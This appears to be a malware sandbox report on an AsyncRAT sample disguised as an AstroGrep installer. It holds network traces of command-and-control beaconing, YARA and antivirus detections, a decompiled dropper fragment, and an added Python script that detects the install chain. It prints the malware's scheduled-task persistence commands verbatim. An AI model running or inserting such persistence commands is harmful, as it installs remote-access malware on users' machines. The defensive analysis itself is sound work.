Jul 17, 2021 22:37:55.237852097 CEST | 49728 | 57667 | 192.168.2.3 | 185.195.232.251
Jul 17, 2021 22:37:55.289629936 CEST | 57667 | 49728 | 185.195.232.251 | 192.168.2.3
Jul 17, 2021 22:38:00.304848909 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:38:00.348762035 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:38:00.355060101 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:38:00.355103970 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:38:00.355227947 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:38:00.358524084 CEST | 49729 | 57667 | 192.168.2.3 | 185.195.232.251
Jul 17, 2021 22:38:00.410294056 CEST | 57667 | 49729 | 185.195.232.251 | 192.168.2.3
Jul 17, 2021 22:38:00.925744057 CEST | 49729 | 57667 | 192.168.2.3 | 185.195.232.251
Jul 17, 2021 22:38:00.977613926 CEST | 57667 | 49729 | 185.195.232.251 | 192.168.2.3
Jul 17, 2021 22:38:01.489135981 CEST | 49729 | 57667 | 192.168.2.3 | 185.195.232.251
                                                                                                          Jul 17, 2021 22:38:01.541713953 CEST5766749729185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:06.553103924 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:06.604161978 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:06.604188919 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:06.608124971 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:06.644505024 CEST4973557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:06.696324110 CEST5766749735185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:07.222953081 CEST4973557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:07.274882078 CEST5766749735185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:07.785509109 CEST4973557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:07.837845087 CEST5766749735185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:12.850732088 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:12.908596992 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:12.908648014 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:12.908916950 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:12.911812067 CEST4973657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:12.963500023 CEST5766749736185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:13.473674059 CEST4973657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:13.525609016 CEST5766749736185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:14.036237955 CEST4973657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:14.088299036 CEST5766749736185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:19.100507975 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:19.157746077 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:19.157783985 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:19.157918930 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:19.160206079 CEST4973757667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:19.213813066 CEST5766749737185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:19.724245071 CEST4973757667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:19.776209116 CEST5766749737185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:20.286585093 CEST4973757667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:20.338562012 CEST5766749737185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:25.351782084 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:25.408749104 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:25.408804893 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:25.409070969 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:25.411675930 CEST4973857667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:25.463526964 CEST5766749738185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:25.974564075 CEST4973857667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:26.026756048 CEST5766749738185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:26.537090063 CEST4973857667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:26.589363098 CEST5766749738185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:31.602516890 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:31.653217077 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:31.653256893 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:31.653330088 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:31.654366970 CEST4973957667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:31.706090927 CEST5766749739185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:32.209482908 CEST4973957667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:32.263637066 CEST5766749739185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:32.772141933 CEST4973957667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:32.825575113 CEST5766749739185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:37.836153984 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:37.889936924 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:37.889977932 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:37.890063047 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:37.891079903 CEST4974157667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:37.942819118 CEST5766749741185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:38.444505930 CEST4974157667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:38.496376991 CEST5766749741185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:39.022516012 CEST4974157667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:39.074287891 CEST5766749741185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:44.086864948 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:44.143095970 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:44.143187046 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:44.143276930 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:44.145308018 CEST4974357667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:44.197426081 CEST5766749743185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:44.710678101 CEST4974357667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:44.762623072 CEST5766749743185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:45.273061991 CEST4974357667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:45.324909925 CEST5766749743185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:50.338172913 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:50.392107010 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:50.392163992 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:50.392383099 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:50.394728899 CEST4974457667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:50.446647882 CEST5766749744185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:50.961253881 CEST4974457667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:51.013128996 CEST5766749744185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:51.523821115 CEST4974457667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:51.576775074 CEST5766749744185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:56.588562012 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:56.642539024 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:56.642585039 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:38:56.642721891 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:38:56.645734072 CEST4974557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:56.697777987 CEST5766749745185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:57.211591005 CEST4974557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:57.263406038 CEST5766749745185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:38:57.774169922 CEST4974557667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:38:57.826600075 CEST5766749745185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:39:02.839700937 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:39:02.920731068 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:39:02.920764923 CEST44349727104.23.98.190192.168.2.3
                                                                                                          Jul 17, 2021 22:39:02.921053886 CEST49727443192.168.2.3104.23.98.190
                                                                                                          Jul 17, 2021 22:39:02.923373938 CEST4974657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:39:02.978770018 CEST5766749746185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:39:03.493395090 CEST4974657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:39:03.545262098 CEST5766749746185.195.232.251192.168.2.3
                                                                                                          Jul 17, 2021 22:39:04.055896044 CEST4974657667192.168.2.3185.195.232.251
                                                                                                          Jul 17, 2021 22:39:04.108259916 CEST5766749746185.195.232.251192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 17, 2021 22:37:53.417326927 CEST | 192.168.2.3 | 8.8.8.8 | 0xaf53 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 17, 2021 22:37:53.476236105 CEST | 8.8.8.8 | 192.168.2.3 | 0xaf53 | No error (0) | pastebin.com | - | 104.23.98.190 | A (IP address) | IN (0x0001)
Jul 17, 2021 22:37:53.476236105 CEST | 8.8.8.8 | 192.168.2.3 | 0xaf53 | No error (0) | pastebin.com | - | 104.23.99.190 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 17, 2021 22:37:53.622780085 CEST | 104.23.98.190 | 443 | 192.168.2.3 | 49727 | 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0 | 54328bd36c14bd82ddaa0c04b25ed9ad

Certificate chain presented in this session:

Subject | Issuer | Not Before | Not After
CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US | CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US | Sat Jul 17 02:00:00 CEST 2021 | Sun Jul 17 01:59:59 CEST 2022
CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:46:39 CET 2020 | Wed Jan 01 00:59:59 CET 2025

Code Manipulations

Statistics

(The CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior charts are interactive in the original report and are not reproduced here.)

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Start time:22:36:58
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\Desktop\ms.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\ms.exe'
                                                                                                          Imagebase:0xa30000
                                                                                                          File size:1068032 bytes
                                                                                                          MD5 hash:DBBB611DAF3ABD47972AE4FAF5D54C95
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Start time:22:37:00
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE'
                                                                                                          Imagebase:0x5f0000
                                                                                                          File size:48640 bytes
                                                                                                          MD5 hash:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Start time:22:37:00
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:950654 bytes
                                                                                                          MD5 hash:A708211241313FEAF9621E571631534D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 5%, Metadefender, Browse
                                                                                                          • Detection: 4%, ReversingLabs
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Start time:22:37:23
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit
                                                                                                          Imagebase:0xbd0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''
                                                                                                          Imagebase:0xbd0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff6b2800000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:37:24
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''
                                                                                                          Imagebase:0xcb0000
                                                                                                          File size:185856 bytes
                                                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:37:25
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:timeout 3
                                                                                                          Imagebase:0x1020000
                                                                                                          File size:26112 bytes
                                                                                                          MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          General

                                                                                                          Start time:22:37:25
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Roaming\astro-grep.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Users\user\AppData\Roaming\astro-grep.exe
                                                                                                          Imagebase:0x770000
                                                                                                          File size:48640 bytes
                                                                                                          MD5 hash:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\astro-grep.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Avira
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Reputation:low

                                                                                                          General

                                                                                                          Start time:22:37:29
                                                                                                          Start date:17/07/2021
                                                                                                          Path:C:\Users\user\AppData\Roaming\astro-grep.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\AppData\Roaming\astro-grep.exe'
                                                                                                          Imagebase:0x430000
                                                                                                          File size:48640 bytes
                                                                                                          MD5 hash:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
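
The process list above is the AsyncRAT install sequence: the dropped client writes a batch file under %TEMP% (tmp7B21.tmp.bat, contents not shown in the report), cmd.exe runs it, a timeout 3 follows and then the copy in AppData\Roaming is launched, while a separate cmd.exe registers a scheduled task with /sc onlogon /rl highest whose action is that same copy. The Python below is an added example, not part of the Joe Sandbox report, that parses the schtasks /create arguments out of a command line and flags the combination of indicators present in these lines, and that recognises the cmd.exe invocation of a %TEMP%\tmpXXXX.tmp.bat. The sample input is constructed from the command lines listed above (Joe Sandbox renders double quotes as '' and single quotes as ') plus two benign lines for contrast; the user-writable directory list and the indicator threshold are assumptions to tune for the environment.

```python
"""Triage process command lines for the AsyncRAT install chain seen in this report."""
import re

# Directory markers (lower-case) that an unprivileged user can write to; assumed list, extend as needed.
USER_WRITABLE_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")

SCHTASKS_CREATE_RE = re.compile(r"schtasks(?:\.exe)?\s+/create\b.*", re.I)
# cmd.exe /c "<...>\Temp\tmpXXXX.tmp.bat" with the report's quote rendering ('' or ') or real quotes.
TEMP_BAT_RE = re.compile(
    r"cmd(?:\.exe)?\s+/c\s+(?:''|['\"])?(?P<bat>[^'\"]*\\temp\\tmp[0-9a-f]{4}\.tmp\.bat)", re.I)

# Constructed sample: command lines from the process list above plus two benign lines.
SAMPLE_COMMANDLINES = [
    r"'C:\Users\user\Desktop\ms.exe'",
    r"'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit",
    r"C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''",
    r"schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''",
    r"timeout 3",
    r"schtasks /create /sc daily /st 03:00 /tn 'NightlyBackup' /tr 'C:\Program Files\Backup\backup.exe'",  # benign
    r"C:\Windows\system32\cmd.exe /c ''C:\Scripts\deploy.bat''",  # benign
]


def parse_schtasks(cmdline):
    """Return {flag: value} for a schtasks /create invocation, or None if the line is not one.

    Flag names are lower-cased; value-less switches such as /f map to "".
    """
    m = SCHTASKS_CREATE_RE.search(cmdline)
    if not m:
        return None
    text = m.group(0).replace("''", "").replace('"', "").replace("'", "")
    text = text.split("&", 1)[0]  # drop a trailing cmd.exe chain such as "& exit"
    flags = {}
    for segment in re.split(r"\s+/(?=[A-Za-z])", text)[1:]:  # element 0 is "schtasks"
        name, _, value = segment.strip().partition(" ")
        flags[name.lower()] = value.strip()
    return flags


def persistence_indicators(flags):
    """Reasons a parsed schtasks /create looks like malware persistence; empty for benign-looking tasks."""
    reasons = []
    if flags.get("sc", "").lower() in ("onlogon", "onstart"):
        reasons.append("runs at every logon/boot (/sc %s)" % flags["sc"])
    if flags.get("rl", "").lower() == "highest":
        reasons.append("asks for the highest available run level (/rl highest)")
    if "f" in flags:
        reasons.append("silently overwrites any existing task with the same name (/f)")
    action = flags.get("tr", "").lower()
    if any(marker in action for marker in USER_WRITABLE_DIRS):
        reasons.append("task action lives in a user-writable directory: %s" % flags["tr"])
    return reasons


def triage(cmdlines, min_indicators=2):
    """Return [(cmdline, reasons)] for lines matching the temp installer batch or a suspicious task."""
    hits = []
    for line in cmdlines:
        flags = parse_schtasks(line)
        if flags is not None:
            reasons = persistence_indicators(flags)
            if len(reasons) >= min_indicators:
                hits.append((line, reasons))
            continue
        m = TEMP_BAT_RE.search(line)
        if m:
            hits.append((line, ["cmd.exe executing a temp installer batch: " + m.group("bat")]))
    return hits


if __name__ == "__main__":
    for line, reasons in triage(SAMPLE_COMMANDLINES):
        print(line)
        for reason in reasons:
            print("   -", reason)
```

The same indicators transfer directly to a detection on process-creation telemetry (Sysmon event 1 or Security event 4688): a schtasks /create whose /tr target sits under a user profile is rare for legitimate software, and combining it with /sc onlogon and /rl highest keeps the false-positive rate low. Note that the task is created by a process that already has administrator privileges here, so the persistence survives as a logon task rather than a Run key and is missed by checks that only look at the registry.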

                                                                                                          Disassembly

                                                                                                          Code Analysis


                                                                                                            Executed Functions

                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00A310C0(void* __eflags, CHAR* _a8, void* _a12) {
                                                                                                            				void* _v8;
                                                                                                            				char _v16;
                                                                                                            				signed int _v20;
                                                                                                            				char _v279;
                                                                                                            				char _v280;
                                                                                                            				intOrPtr _v288;
                                                                                                            				void* _v292;
                                                                                                            				CHAR* _v308;
                                                                                                            				intOrPtr _v316;
                                                                                                            				intOrPtr _v320;
                                                                                                            				char _v336;
                                                                                                            				CHAR* _v340;
                                                                                                            				CHAR* _v344;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t48;
                                                                                                            				signed int _t49;
                                                                                                            				intOrPtr* _t54;
                                                                                                            				void* _t55;
                                                                                                            				unsigned int _t56;
                                                                                                            				void* _t59;
                                                                                                            				CHAR* _t63;
                                                                                                            				void* _t66;
                                                                                                            				long _t67;
                                                                                                            				intOrPtr _t72;
                                                                                                            				void* _t86;
                                                                                                            				char _t88;
                                                                                                            				void _t89;
                                                                                                            				void _t90;
                                                                                                            				signed int _t92;
                                                                                                            				void _t97;
                                                                                                            				void* _t106;
                                                                                                            				void* _t107;
                                                                                                            				void* _t108;
                                                                                                            				void* _t113;
                                                                                                            				void* _t115;
                                                                                                            				void* _t121;
                                                                                                            				void* _t123;
                                                                                                            				void* _t128;
                                                                                                            				struct HRSRC__* _t131;
                                                                                                            				intOrPtr _t132;
                                                                                                            				void* _t133;
                                                                                                            				signed int _t134;
                                                                                                            				void* _t135;
                                                                                                            				void* _t137;
                                                                                                            				void* _t139;
                                                                                                            
                                                                                                            				_push(0xffffffff);
                                                                                                            				_push(E00A385CB);
                                                                                                            				_push( *[fs:0x0]);
                                                                                                            				_t48 =  *0xa3d07c; // 0xa189a5e1
                                                                                                            				_t49 = _t48 ^ _t134;
                                                                                                            				_v20 = _t49;
                                                                                                            				_push(_t49);
                                                                                                            				 *[fs:0x0] =  &_v16;
                                                                                                            				_t113 = _a12;
                                                                                                            				_v344 = _a8;
                                                                                                            				_v340 = _t113;
                                                                                                            				_v280 = 0;
                                                                                                            				E00A357C0( &_v279, 0, 0x103);
                                                                                                            				_t137 = _t135 - 0x148 + 0xc;
                                                                                                            				E00A323A0( &_v279,  &_v336);
                                                                                                            				_v8 = 0;
                                                                                                            				_t54 = E00A32370( &_v279,  &_v308);
                                                                                                            				if( *((intOrPtr*)(_t54 + 0x14)) >= 0x10) {
                                                                                                            					_t54 =  *_t54;
                                                                                                            				}
                                                                                                            				_t106 =  &_v280 - _t54;
                                                                                                            				do {
                                                                                                            					_t88 =  *_t54;
                                                                                                            					 *((char*)(_t106 + _t54)) = _t88;
                                                                                                            					_t54 = _t54 + 1;
                                                                                                            				} while (_t88 != 0);
                                                                                                            				if(_v288 >= 0x10) {
                                                                                                            					_push(_v308);
                                                                                                            					E00A32BB1();
                                                                                                            					_t137 = _t137 + 4;
                                                                                                            				}
                                                                                                            				_t55 = _t113;
                                                                                                            				_t107 = _t113;
                                                                                                            				do {
                                                                                                            					_t89 =  *_t55;
                                                                                                            					_t55 = _t55 + 1;
                                                                                                            				} while (_t89 != 0);
                                                                                                            				_t56 = _t55 - _t107;
                                                                                                            				_t115 =  &_v280 - 1;
                                                                                                            				do {
                                                                                                            					_t90 =  *(_t115 + 1);
                                                                                                            					_t115 = _t115 + 1;
                                                                                                            				} while (_t90 != 0);
                                                                                                            				_t92 = _t56 >> 2;
                                                                                                            				_t128 = _t107;
                                                                                                            				_t59 = memcpy(_t128 + _t92 + _t92, _t128, memcpy(_t115, _t128, _t92 << 2) & 0x00000003);
                                                                                                            				_t139 = _t137 + 0x18;
                                                                                                            				_v288 = 0xf;
                                                                                                            				_v292 = 0;
                                                                                                            				_v308 = 0;
